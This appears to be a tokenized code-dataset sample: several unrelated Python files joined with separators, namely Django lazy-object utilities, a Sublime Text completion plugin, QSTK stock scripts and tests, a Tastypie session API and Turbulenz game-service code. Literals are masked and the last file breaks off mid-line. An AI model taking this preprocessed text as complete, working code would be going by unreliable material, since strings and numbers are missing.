<EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) == other <EOL> def __lt__ ( self , other ) : <EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) < other <EOL> def __hash__ ( self ) : <EOL> return hash ( self . __cast ( ) ) <EOL> def __mod__ ( self , rhs ) : <EOL> if self . _delegate_bytes and six . PY2 : <EOL> return bytes ( self ) % rhs <EOL> elif self . _delegate_text : <EOL> return six . text_type ( self ) % rhs <EOL> return self . __cast ( ) % rhs <EOL> def __deepcopy__ ( self , memo ) : <EOL> memo [ id ( self ) ] = self <EOL> return self <EOL> @ wraps ( func ) <EOL> def __wrapper__ ( * args , ** kw ) : <EOL> return __proxy__ ( args , kw ) <EOL> return __wrapper__ <EOL> def _lazy_proxy_unpickle ( func , args , kwargs , * resultclasses ) : <EOL> return lazy ( func , * resultclasses ) ( * args , ** kwargs ) <EOL> def allow_lazy ( func , * resultclasses ) : <EOL> """<STR_LIT>""" <EOL> @ wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> for arg in list ( args ) + list ( six . itervalues ( kwargs ) ) : <EOL> if isinstance ( arg , Promise ) : <EOL> break <EOL> else : <EOL> return func ( * args , ** kwargs ) <EOL> return lazy ( func , * resultclasses ) ( * args , ** kwargs ) <EOL> return wrapper <EOL> empty = object ( ) <EOL> def new_method_proxy ( func ) : <EOL> def inner ( self , * args ) : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> return func ( self . _wrapped , * args ) <EOL> return inner <EOL> class LazyObject ( object ) : <EOL> """<STR_LIT>""" <EOL> _wrapped = None <EOL> def __init__ ( self ) : <EOL> self . _wrapped = empty <EOL> __getattr__ = new_method_proxy ( getattr ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> self . __dict__ [ "<STR_LIT>" ] = value <EOL> else : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> setattr ( self . _wrapped , name , value ) <EOL> def __delattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> delattr ( self . _wrapped , name ) <EOL> def _setup ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def __getstate__ ( self ) : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> return self . _wrapped . __dict__ <EOL> @ classmethod <EOL> def __newobj__ ( cls , * args ) : <EOL> return cls . __new__ ( cls , * args ) <EOL> def __reduce_ex__ ( self , proto ) : <EOL> if proto >= <NUM_LIT:2> : <EOL> return ( self . __newobj__ , ( self . __class__ , ) , self . __getstate__ ( ) ) <EOL> else : <EOL> return ( copyreg . _reconstructor , ( self . __class__ , object , None ) , self . __getstate__ ( ) ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> if self . _wrapped is empty : <EOL> result = type ( self ) ( ) <EOL> memo [ id ( self ) ] = result <EOL> return result <EOL> return copy . deepcopy ( self . _wrapped , memo ) <EOL> if six . PY3 : <EOL> __bytes__ = new_method_proxy ( bytes ) <EOL> __str__ = new_method_proxy ( str ) <EOL> __bool__ = new_method_proxy ( bool ) <EOL> else : <EOL> __str__ = new_method_proxy ( str ) <EOL> __unicode__ = new_method_proxy ( unicode ) <EOL> __nonzero__ = new_method_proxy ( bool ) <EOL> __dir__ = new_method_proxy ( dir ) <EOL> __class__ = property ( new_method_proxy ( operator . attrgetter ( "<STR_LIT>" ) ) ) <EOL> __eq__ = new_method_proxy ( operator . eq ) <EOL> __ne__ = new_method_proxy ( operator . ne ) <EOL> __hash__ = new_method_proxy ( hash ) <EOL> __getitem__ = new_method_proxy ( operator . getitem ) <EOL> __setitem__ = new_method_proxy ( operator . setitem ) <EOL> __delitem__ = new_method_proxy ( operator . delitem ) <EOL> __len__ = new_method_proxy ( len ) <EOL> __contains__ = new_method_proxy ( operator . contains ) <EOL> _super = super <EOL> class SimpleLazyObject ( LazyObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ [ '<STR_LIT>' ] = func <EOL> _super ( SimpleLazyObject , self ) . __init__ ( ) <EOL> def _setup ( self ) : <EOL> self . _wrapped = self . _setupfunc ( ) <EOL> def __repr__ ( self ) : <EOL> if self . _wrapped is empty : <EOL> repr_attr = self . _setupfunc <EOL> else : <EOL> repr_attr = self . _wrapped <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , repr_attr ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> if self . _wrapped is empty : <EOL> result = SimpleLazyObject ( self . _setupfunc ) <EOL> memo [ id ( self ) ] = result <EOL> return result <EOL> return copy . deepcopy ( self . _wrapped , memo ) <EOL> class lazy_property ( property ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , fget = None , fset = None , fdel = None , doc = None ) : <EOL> if fget is not None : <EOL> @ wraps ( fget ) <EOL> def fget ( instance , instance_type = None , name = fget . __name__ ) : <EOL> return getattr ( instance , name ) ( ) <EOL> if fset is not None : <EOL> @ wraps ( fset ) <EOL> def fset ( instance , value , name = fset . __name__ ) : <EOL> return getattr ( instance , name ) ( value ) <EOL> if fdel is not None : <EOL> @ wraps ( fdel ) <EOL> def fdel ( instance , name = fdel . __name__ ) : <EOL> return getattr ( instance , name ) ( ) <EOL> return property ( fget , fset , fdel , doc ) <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:2> ) : <EOL> from functools import total_ordering <EOL> else : <EOL> def total_ordering ( cls ) : <EOL> """<STR_LIT>""" <EOL> convert = { <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not ( self < other or self == other ) ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self < other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self < other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not self <= other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self <= other and not self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self <= other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not ( self > other or self == other ) ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self > other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self > other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : ( not self >= other ) or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self >= other and not self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self >= other ) ] <EOL> } <EOL> roots = set ( dir ( cls ) ) & set ( convert ) <EOL> if not roots : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> root = max ( roots ) <EOL> for opname , opfunc in convert [ root ] : <EOL> if opname not in roots : <EOL> opfunc . __name__ = opname <EOL> opfunc . __doc__ = getattr ( int , opname ) . __doc__ <EOL> setattr ( cls , opname , opfunc ) <EOL> return cls </s>
<s> import unittest <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> class CubeTestCase ( unittest . TestCase ) : <EOL> pass </s>
<s> import sublime , sublime_plugin <EOL> import re <EOL> common = { "<STR_LIT>" : [ "<STR_LIT:true>" , "<STR_LIT:false>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } <EOL> tss_data = """<STR_LIT>""" <EOL> def parse_tss_data ( data ) : <EOL> props = { } <EOL> for l in data . splitlines ( ) : <EOL> if l == "<STR_LIT>" : <EOL> continue <EOL> names , values = l . split ( '<STR_LIT:=>' ) <EOL> allowed_values = [ ] <EOL> for v in values . split ( '<STR_LIT:|>' ) : <EOL> v = v . strip ( ) <EOL> if v [ <NUM_LIT:0> ] == '<STR_LIT:<>' and v [ - <NUM_LIT:1> ] == '<STR_LIT:>>' : <EOL> key = v [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if key in common : <EOL> allowed_values += common [ key ] <EOL> else : <EOL> allowed_values . append ( v ) <EOL> for e in names . split ( ) : <EOL> if e [ <NUM_LIT:0> ] == '<STR_LIT:">' : <EOL> props [ e [ <NUM_LIT:1> : - <NUM_LIT:1> ] ] = sorted ( allowed_values ) <EOL> else : <EOL> break <EOL> return props <EOL> class TSSCompletions ( sublime_plugin . EventListener ) : <EOL> props = None <EOL> rex = None <EOL> def on_query_completions ( self , view , prefix , locations ) : <EOL> if not view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) : <EOL> return [ ] <EOL> if not self . props : <EOL> self . props = parse_tss_data ( tss_data ) <EOL> self . rex = re . compile ( "<STR_LIT>" ) <EOL> l = [ ] <EOL> if ( view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) or <EOL> view . match_selector ( locations [ <NUM_LIT:0> ] - <NUM_LIT:1> , "<STR_LIT>" ) ) : <EOL> loc = locations [ <NUM_LIT:0> ] - len ( prefix ) <EOL> line = view . substr ( sublime . Region ( view . line ( loc ) . begin ( ) , loc ) ) <EOL> m = re . search ( self . rex , line ) <EOL> if m : <EOL> prop_name = m . group ( <NUM_LIT:1> ) <EOL> if prop_name in self . props : <EOL> values = self . props [ prop_name ] <EOL> add_semi_colon = view . substr ( sublime . Region ( locations [ <NUM_LIT:0> ] , locations [ <NUM_LIT:0> ] + <NUM_LIT:1> ) ) != '<STR_LIT:U+002C>' <EOL> for v in values : <EOL> desc = v <EOL> snippet = v <EOL> if add_semi_colon : <EOL> snippet += "<STR_LIT:U+002C>" <EOL> if snippet . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> desc = desc . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> l . append ( ( desc , snippet ) ) <EOL> return ( l , sublime . INHIBIT_WORD_COMPLETIONS ) <EOL> return None <EOL> else : <EOL> add_colon = not view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> for p in self . props : <EOL> if add_colon : <EOL> l . append ( ( p , p + "<STR_LIT>" ) ) <EOL> else : <EOL> l . append ( ( p , p ) ) <EOL> return ( l , sublime . INHIBIT_WORD_COMPLETIONS ) </s>
<s> def storage ( conf = None ) : <EOL> from hm . storage import MongoDBStorage <EOL> return MongoDBStorage ( conf ) <EOL> class BaseModel ( object ) : <EOL> def storage ( self ) : <EOL> return storage ( self . config ) </s>
<s> from django . conf . urls import include , patterns , url <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ) </s>
<s> import matplotlib . pyplot as plt <EOL> from pylab import * <EOL> from qstkutil import DataAccess as da <EOL> from qstkutil import timeutil as tu <EOL> from qstkutil import timeseries as ts <EOL> symbols = list ( ) <EOL> symbols = list ( np . loadtxt ( '<STR_LIT>' , dtype = '<STR_LIT:str>' , delimiter = '<STR_LIT:U+002C>' , <EOL> comments = '<STR_LIT:#>' , skiprows = <NUM_LIT:0> ) ) <EOL> symbols . append ( "<STR_LIT>" ) <EOL> tsstart = tu . ymd2epoch ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tsend = tu . ymd2epoch ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> storename = "<STR_LIT>" <EOL> fieldname = "<STR_LIT>" <EOL> adjcloses = ts . getTSFromData ( storename , fieldname , symbols , tsstart , tsend ) <EOL> print "<STR_LIT>" <EOL> print symbols <EOL> print adjcloses . values <EOL> dates = [ ] <EOL> for ts in adjcloses . timestamps : <EOL> dates . append ( tu . epoch2date ( ts ) ) <EOL> normdat = adjcloses . values / adjcloses . values [ <NUM_LIT:0> , : ] <EOL> plt . clf ( ) <EOL> for i in range ( <NUM_LIT:0> , size ( normdat [ <NUM_LIT:0> , : ] ) ) : <EOL> plt . plot ( dates , normdat [ : , i ] ) <EOL> plt . legend ( symbols ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . draw ( ) <EOL> savefig ( "<STR_LIT>" , format = '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> import datetime as dt <EOL> import unittest <EOL> import pandas as pand <EOL> import numpy as np <EOL> import qstksim <EOL> class Test ( unittest . TestCase ) : <EOL> df_close = None <EOL> df_alloc = None <EOL> i_open_result = None <EOL> def _generate_data ( self ) : <EOL> ldt_timestamps = [ ] <EOL> na_close = np . ones ( ( <NUM_LIT:16> , <NUM_LIT:3> ) ) <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , i + <NUM_LIT:1> , <NUM_LIT:9> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , i + <NUM_LIT:1> , <NUM_LIT:16> ) ) <EOL> for i in range ( <NUM_LIT:16> ) : <EOL> if i == <NUM_LIT:0> : <EOL> na_close [ i , : ] = <NUM_LIT:1> <EOL> else : <EOL> na_close [ i , <NUM_LIT:0> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> na_close [ i , <NUM_LIT:1> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:1> ] - <NUM_LIT> <EOL> if ( i % <NUM_LIT:3> == <NUM_LIT:0> ) : <EOL> na_close [ i , <NUM_LIT:2> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:2> ] + <NUM_LIT> <EOL> else : <EOL> na_close [ i , <NUM_LIT:2> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> self . df_close = pand . DataFrame ( index = ldt_timestamps , data = na_close , columns = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> na_alloc = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> ] , [ <NUM_LIT:1.0> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> ] ] ) <EOL> ldt_timestamps = [ dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT> ) ] <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:20> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:20> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:4> ) ) <EOL> self . df_alloc = pand . DataFrame ( index = ldt_timestamps , data = na_alloc , columns = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> self . df_alloc [ '<STR_LIT>' ] = <NUM_LIT:0.0> <EOL> self . i_open_result = <NUM_LIT> <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _generate_data ( ) <EOL> def test_buy_close ( self ) : <EOL> '''<STR_LIT>''' <EOL> ( df_funds , ts_leverage , f_commision , f_slippage , f_borrow ) = qstksim . tradesim ( self . df_alloc , self . df_close , <NUM_LIT> , <NUM_LIT:1> , True , <NUM_LIT> , <EOL> <NUM_LIT:5> , <NUM_LIT> ) <EOL> print '<STR_LIT>' + str ( f_commision ) <EOL> print '<STR_LIT>' + str ( f_slippage ) <EOL> print '<STR_LIT>' + str ( f_borrow ) <EOL> print '<STR_LIT>' <EOL> print ts_leverage <EOL> np . testing . assert_approx_equal ( df_funds [ - <NUM_LIT:1> ] , <NUM_LIT> * self . i_open_result , significant = <NUM_LIT:3> ) <EOL> self . assertTrue ( True ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . conf import settings <EOL> from django . contrib . auth import login <EOL> from django . contrib . auth import logout <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . models import User <EOL> from tastypie import fields <EOL> from tastypie . exceptions import NotFound <EOL> from tastypie . exceptions import BadRequest <EOL> from tastypie . resources import Resource <EOL> from tastypie . resources import ModelResource <EOL> from tastypie . bundle import Bundle <EOL> from tastypie . authorization import Authorization <EOL> tur_settings = getattr ( settings , "<STR_LIT>" , { } ) <EOL> class UserSession ( object ) : <EOL> @ classmethod <EOL> def session_get_key ( cls , request , create_if_needed = True ) : <EOL> if not request . session . session_key and create_if_needed : <EOL> request . session . create ( ) <EOL> return request . session . session_key <EOL> @ classmethod <EOL> def object_for_request ( cls , request ) : <EOL> s = cls ( ) <EOL> s . id = cls . session_get_key ( request ) <EOL> s . expire_date = request . session . get_expiry_date ( ) <EOL> s . user = None <EOL> if request . user . is_authenticated ( ) : <EOL> s . user = request . user <EOL> return s <EOL> class UserResource ( ModelResource ) : <EOL> class Meta : <EOL> queryset = User . objects . all ( ) <EOL> resource_name = "<STR_LIT:user>" <EOL> authorization = Authorization ( ) <EOL> excludes = ( <EOL> "<STR_LIT:password>" , <EOL> ) , <EOL> class UserSessionResource ( Resource ) : <EOL> id = fields . CharField ( attribute = "<STR_LIT:id>" , readonly = True ) <EOL> expire_date = fields . DateTimeField ( attribute = "<STR_LIT>" , readonly = True ) <EOL> if "<STR_LIT>" in tur_settings : <EOL> user = fields . ForeignKey ( tur_settings [ "<STR_LIT>" ] , attribute = "<STR_LIT:user>" , readonly = True , null = True ) <EOL> else : <EOL> user = fields . ForeignKey ( UserResource , attribute = "<STR_LIT:user>" , readonly = True , null = True ) <EOL> class Meta : <EOL> resource_name = "<STR_LIT>" <EOL> object_class = UserSession <EOL> authorization = Authorization ( ) <EOL> def get_resource_uri ( self , bundle_or_obj = None , url_name = "<STR_LIT>" ) : <EOL> if not bundle_or_obj : <EOL> return super ( UserSessionResource , self ) . get_resource_uri ( bundle_or_obj , url_name ) <EOL> obj = bundle_or_obj <EOL> if isinstance ( obj , Bundle ) : <EOL> obj = obj . obj <EOL> kwargs = { <EOL> "<STR_LIT>" : self . _meta . resource_name , <EOL> "<STR_LIT>" : obj . id <EOL> } <EOL> if self . _meta . api_name : <EOL> kwargs [ "<STR_LIT>" ] = self . _meta . api_name <EOL> url = self . _build_reverse_url ( "<STR_LIT>" , kwargs = kwargs ) <EOL> return url <EOL> def _build_reverse_url ( self , name , args = None , kwargs = None ) : <EOL> ret = reverse ( name , args = args , kwargs = kwargs ) <EOL> return ret <EOL> def get_object_list ( self , request ) : <EOL> l = [ ] <EOL> try : <EOL> obj = self . _build_session_object_or_raise ( request ) <EOL> l . append ( obj ) <EOL> except NotFound : <EOL> pass <EOL> return l <EOL> def obj_get_list ( self , request = None , ** kwargs ) : <EOL> return self . get_object_list ( request ) <EOL> def obj_get ( self , request = None , ** kwargs ) : <EOL> return self . _build_session_object_or_raise ( request , kwargs [ "<STR_LIT>" ] ) <EOL> def obj_create ( self , bundle , request = None , ** kwargs ) : <EOL> user = self . find_or_create_user_for_new_session ( bundle , request , ** kwargs ) <EOL> if not user : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> login ( request , user ) <EOL> bundle . obj = self . _build_session_object ( request ) <EOL> bundle = self . full_hydrate ( bundle ) <EOL> return bundle <EOL> def obj_update ( self , bundle , request = None , ** kwargs ) : <EOL> bundle . obj = self . _build_session_object_or_raise ( request , kwargs [ "<STR_LIT>" ] ) <EOL> bundle = self . full_hydrate ( bundle ) <EOL> request . session . modified = True <EOL> return bundle <EOL> def obj_delete_list ( self , request = None , ** kwargs ) : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> def obj_delete ( self , request = None , ** kwargs ) : <EOL> self . _build_session_object_or_raise ( request , pk = kwargs [ "<STR_LIT>" ] ) <EOL> logout ( request ) <EOL> def rollback ( self , bundles ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _build_session_object ( self , request ) : <EOL> return self . _meta . object_class . object_for_request ( request ) <EOL> def _build_session_object_or_raise ( self , request , pk = None ) : <EOL> key = self . _meta . object_class . session_get_key ( request , create_if_needed = False ) <EOL> if not key : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> if pk and pk != key : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> return self . _build_session_object ( request ) <EOL> class FacebookAuthUserSessionResource ( UserSessionResource ) : <EOL> """<STR_LIT>""" <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> return authenticate ( <EOL> fb_use_cookie = bool ( bundle . data . get ( "<STR_LIT>" , False ) ) , <EOL> fb_code = bundle . data . get ( "<STR_LIT>" , None ) , <EOL> fb_token = bundle . data . get ( "<STR_LIT>" , None ) , <EOL> request = request , <EOL> register_new_users = True <EOL> ) <EOL> class DjangoAuthUserSessionResource ( UserSessionResource ) : <EOL> """<STR_LIT>""" <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> return authenticate ( ** bundle . data ) </s>
<s> from logging import getLogger <EOL> from yaml . scanner import ScannerError <EOL> from pylons import response <EOL> from turbulenz_local . lib . servicestatus import ServiceStatus <EOL> from turbulenz_local . decorators import jsonify , secure_post <EOL> from turbulenz_local . controllers import BaseController <EOL> from turbulenz_local . models . gamelist import get_game_by_slug <EOL> from turbulenz_local . models . apiv1 . badges import Badges , BadgesUnsupportedException <EOL> from turbulenz_local . models . userlist import get_current_user <EOL> from turbulenz_local . lib . exceptions import ApiException <EOL> LOG = getLogger ( __name__ ) <EOL> class BadgesController ( BaseController ) : <EOL> """<STR_LIT>""" <EOL> badges_service = ServiceStatus . check_status_decorator ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> @ jsonify <EOL> def badges_user_list ( cls , slug = None ) : <EOL> try : <EOL> game = get_game_by_slug ( slug ) <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> user = get_current_user ( ) <EOL> badges_obj = Badges . get_singleton ( game ) <EOL> badges = badges_obj . badges <EOL> badges_total_dict = dict ( ( b [ '<STR_LIT:key>' ] , b . get ( '<STR_LIT>' ) ) for b in badges ) <EOL> userbadges = badges_obj . find_userbadges_by_user ( user . username ) <EOL> for key , userbadge in userbadges . iteritems ( ) : <EOL> del userbadge [ '<STR_LIT:username>' ] <EOL> try : <EOL> total = badges_total_dict [ key ] <EOL> except KeyError : <EOL> continue <EOL> userbadge [ '<STR_LIT>' ] = total <EOL> userbadge [ '<STR_LIT>' ] = ( userbadge [ '<STR_LIT>' ] >= total ) <EOL> response . status_int = <NUM_LIT:200> <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : userbadges . values ( ) } <EOL> except BadgesUnsupportedException : <EOL> return { '<STR_LIT>' : False , '<STR_LIT:data>' : [ ] } <EOL> except ApiException as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } <EOL> @ classmethod <EOL> @ badges_service <EOL> @ jsonify <EOL> def badges_list ( cls , slug ) : <EOL> try : <EOL> game = get_game_by_slug ( slug ) <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badges = Badges . get_singleton ( game ) . badges <EOL> for badge in badges : <EOL> if '<STR_LIT>' not in badge : <EOL> badge [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in badge : <EOL> badge [ '<STR_LIT>' ] = None <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : badges } <EOL> except BadgesUnsupportedException : <EOL> return { '<STR_LIT>' : False , '<STR_LIT:data>' : [ ] } <EOL> except ApiException as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } <EOL> except ScannerError as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' % ( message ) } <EOL> @ classmethod <EOL> @ badges_service <EOL> @ secure_post <EOL> def badges_user_add ( cls , slug , params = None ) : <EOL> try : <EOL> session = cls . _get_gamesession ( params ) <EOL> game = session . game <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badge_key = params [ '<STR_LIT>' ] <EOL> if not badge_key : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badges_obj = Badges . get_singleton ( game ) <EOL> badge = badges_obj . get_badge ( badge_key ) <EOL> if not badge : <EOL> raise ApiException ( '<STR_LIT>' % badge_key ) <EOL> if not ( '<STR_LIT:image>' in badge ) or not badge [ '<STR_LIT:image>' ] : <EOL> badge [ '<STR_LIT:image>' ] = '<STR_LIT>' <EOL> ub = { '<STR_LIT:username>' : session . user . username , <EOL> '<STR_LIT>' : badge [ '<STR_LIT:key>' ] } <EOL> badge_total = badge . get ( '<STR_LIT>' ) <EOL> total = badge_total or <NUM_LIT:1.0> <EOL> current = <NUM_LIT:0> <EOL> if '<STR_LIT>' in params : <EOL> try : <EOL> current = float ( int ( params [ '<STR_LIT>' ] ) ) <EOL> except ( ValueError , TypeError ) : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> if not current : <EOL> current = total <EOL> ub [ '<STR_LIT>' ] = current <EOL> userbadge = badges_obj . get_userbadge ( session . user . username , badge_key ) <EOL> Badges . get_singleton ( game ) . upsert_badge ( ub ) <EOL> if current >= total and ( not userbadge or userbadge . get ( '<STR_LIT>' , <NUM_LIT:0> ) < total ) : <EOL> achieved = True <EOL> else : <EOL> achieved = False <EOL> response . status_int = <NUM_LIT:200> <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : current , <EOL> '<STR_LIT>' : badge_total , <EOL> '<STR_LIT>' : badge_key , <EOL> '<STR_LIT>' : achieved <EOL> } } <EOL> except BadgesUnsupportedException : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> except ApiException as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import urllib2 <EOL> from hashlib import md5 <EOL> from urllib import urlencode <EOL> from os . path import join as path_join <EOL> from platform import system as platform_system <EOL> import simplejson as json <EOL> from yaml import load as yaml_load <EOL> from paste . deploy . converters import asbool , asint <EOL> from pylons import request <EOL> from turbulenz_local import SDK_VERSION , CONFIG_PATH <EOL> from turbulenz_local . models . gamelist import get_game_by_slug <EOL> from turbulenz_local . tools import slugify as slugify_fn <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def turbulenz_api ( endpoint , timeout = <NUM_LIT:5> ) : <EOL> try : <EOL> f = urllib2 . urlopen ( endpoint , None , timeout ) <EOL> try : <EOL> data = json . load ( f ) <EOL> finally : <EOL> f . close ( ) <EOL> except urllib2 . URLError as e : <EOL> LOG . error ( '<STR_LIT>' , endpoint ) <EOL> LOG . error ( '<STR_LIT>' , str ( e ) ) <EOL> data = { } <EOL> return data <EOL> def turbulenz_sdk_version ( sdk_version ) : <EOL> query = turbulenz_api ( sdk_version ) <EOL> if query . get ( '<STR_LIT>' , False ) : <EOL> data = query . get ( '<STR_LIT:data>' , None ) <EOL> if data : <EOL> os_mapping = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> sysname = platform_system ( ) <EOL> os = os_mapping 